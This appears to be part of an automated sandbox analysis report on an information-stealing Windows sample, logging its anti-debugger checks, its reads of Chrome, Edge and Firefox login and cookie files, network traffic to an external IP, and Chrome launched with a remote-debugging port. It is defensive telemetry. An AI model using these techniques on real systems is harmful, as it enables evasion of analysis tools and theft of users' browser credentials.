Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: NTICE
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: SICE
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: SIWVID
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00208230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00208230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_0020116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 9_2_0020116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00201160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_00201160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_002011A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 9_2_002013C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8C84D0 cpuid 9_2_6C8C84D0
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 9.2.service123.exe.6c840000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 7580, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.10:49715 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Remote Access Functionality

Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP